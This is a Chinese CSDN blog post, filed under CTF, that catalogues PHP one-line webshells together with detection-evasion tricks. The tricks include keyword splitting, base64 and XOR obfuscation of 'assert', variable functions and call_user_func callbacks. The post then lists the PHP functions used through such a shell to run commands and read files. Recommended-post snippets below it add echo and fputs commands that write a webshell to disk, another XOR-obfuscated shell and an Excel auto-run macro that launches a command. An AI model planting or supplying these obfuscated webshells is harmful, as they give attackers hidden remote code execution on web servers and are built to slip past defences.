一句话木马

最新推荐文章于 2024-03-11 21:05:14 发布
最新推荐文章于 2024-03-11 21:05:14 发布
阅读量325 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Anton__1/article/details/116431788
版权

#一句话木马

传统防护检测的的免杀方法:

一、隐藏关键字

绕过php代码标志<?的限制:

<script language="php">@eval($_POST['x'])</script>

拆分拼接:

<?php
$arr=explode(",","a,s,d,f,s,d,e,k,r,t"); //把字符串打散为数组
$payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert
//php版本要求:<=7.0
@$payload(@$_GET['x']);
?>

编码:

<?php
    $a=base64_decode("YXNzZXJ0");
    @$a($_POST('cmd'));
?>

随机异或,用异或运算来组成字符:

<?php
//也可以用十六进制进行进一步加密,例如
//$r="x4d"^"x3f";
$a="Y"^"8";//a
$b="T"^"'";//s
$c="*"^"O";//e
$d="M"^"?";//r
$e="-"^"Y";//t
$payload=$a.$b.$b.$c.$d.$e;//拼接成assert
@$payload(@$_POST['x']);
?>

可变函数:

<?php
@$_REQUEST['e'](@$_REQUEST['x']);
//传入e=assert&x=command
?>

可变变量:

<?php
$a='assert';
$b='a';
//$$b=$a='assert'
$$b($_POST['x']); //assert($_POST['x'])
?>

二、使用回调函数

回调函数:PHP是将函数以string形式传递的。可以使用任何内置或用户自定义函数,但除了语言结构例如:array(),echo,empty(),eval(),exit(),isset(),list(),print 或 unset()。

call_user_func ( $callback , $parameter)
$callback :被调用的回调函数
$parameter0个或以上的参数,被传入回调函数

<?php  
 @call_user_func($_GET['id'],$_POST['a']);
 //传入id=eval&a=command
?>

三、木马的使用

1、执行系统命令:

system()–执行外部程序,并显示输出

passthru()–执行外部程序并且显示原始输出

exec()–执行一个外部程序,不输出结果,echo返回结果的最后一行。

shell_exec()或–通过shell环境执行命令,需要echo

2、读文件:

file_ get_contents 一将整个文件读入为一个字符串

file()一把整个文件读入一个数组中

readfile一读取一个文件,并写入到输出缓冲

3、遍历目录:

scandir() 函数返回一个指定目录中的文件和目录的数组

未完待续~~~~

H3h3QAQ
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
利用无参数的RCE注入写一个一句话木马
qq_51553814的博客
10-22 3332
昨天做了一个无参数注入RCE的题,学到后面发现还可以直接用RCE写一个一句话木马进去 今天来总结一下 以下是源码 <?php header("content-type:text/html;charset=utf-8"); if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { echo "error"; } highlight_file
一句话木马要点和防范注意事项
最新发布
05-24
一句话木马要点和防范注意事项
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 1296
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
Echo写入一句话木马+分段写入
weixin_43457035的博客
11-20 2360
echo写入一句话木马+分段写入
一句话***(webshell)是如何执行命令的
weixin_34381687的博客
06-16 1871
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。&lt;?php @eval($_POST['cmd']); ?&gt;看到这里不得不赞美前...
一句话木马的套路
whatday的专栏
02-23 1667
0×01 前言 尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。 0×02 关于 eval 于 assert 关于 eval 函数在 php 给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你...
Windows和Linux下写入一句话PHP木马echo命令总结
热门推荐
weixin_40650190的博客
04-16 1万+
1.Windows: echo ^<?php @eval($_POST['x']); ?^> >shell.php 知识点:^以转义字符的身份出现。因为在cmd环境中,有些字符具备特殊功能,如>、>>表示重定向,|表示管道,&、&&、||表示语句连接……它们都有特定的功度能,如果需要把它们作为字符输出知的话,echo >、ec...
探索基于.NET下实现一句话木马之asmx篇1
08-03
云影实验室探索基于.NET 下实现一句话木马之 asmx 篇Ivan@360 云影实验室2018 年 07 月 18 日云影实验室0x01 前言上篇介绍了一般处
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
使用一句话木马进行读取文件flag,不能链接木马管理工具时
02-17 865
a=echo file_get_contents("../../../flag");
一句话木马的深入理解
giaogiao123的博客
08-08 876
我们都知道一句话木马比如说 <?php @eval($_POST['cmd']);?> 我们平常的认知都是去写入一句话木马到一个php文件或者是jsp文件,然后连接那个文件的目录,实际上,不需要写入文件,我们照样可以利用eval函数造成一句话的形成最后拿下网站webshell demo <?php if(isset($_GET['c'])){ $c = $_GET['c']; eval($c); }else{ highlight_file(__FILE_
变形的一句话木马
时光凉春衫薄的博客
10-14 1548
变形的一句话木马 下图是一个解析的东西:这是个一句话木马的变形通过异或运算来规避所有的敏感函数。。。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?&gt...
一句话木马该怎么实现?现在就带你了解
m0_59598029的博客
02-23 843
一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。
命令执行--系统命令
bylfsj的博客
09-26 955
一、利用漏洞获取webshell 漏洞上传,形成一句话木马,利用命令执行获得webshell fputs(fopen("a.php","w"),'<?php eval($_POST["cmd"])?>'); 以防过滤,可以利用ASCII转换,连接执行。 1.要点:要清楚单双引号的区别。 单引号,引号内部的变量不会执行,直接输出。 双引号,会经过编译器解释后执行。 问:你看出来什么...
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值